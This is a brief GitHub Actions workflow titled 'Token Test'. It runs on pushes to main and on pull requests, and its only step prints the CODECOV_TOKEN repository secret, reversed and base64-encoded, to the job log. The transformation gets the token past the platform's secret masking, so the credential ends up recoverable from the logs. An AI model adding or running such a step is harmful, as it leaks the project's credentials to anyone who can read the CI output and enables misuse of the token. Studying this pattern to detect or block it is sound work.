name: Token Test

on:
  push:
    branches:
      - main
  pull_request:

concurrency:
  group: ${{ github.workflow }}-${{ github.event_name }}-${{ github.ref_name }}
  cancel-in-progress: true

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - run: printf '%s' "$token" | rev | base64
        env:
          token: ${{ secrets.CODECOV_TOKEN }}
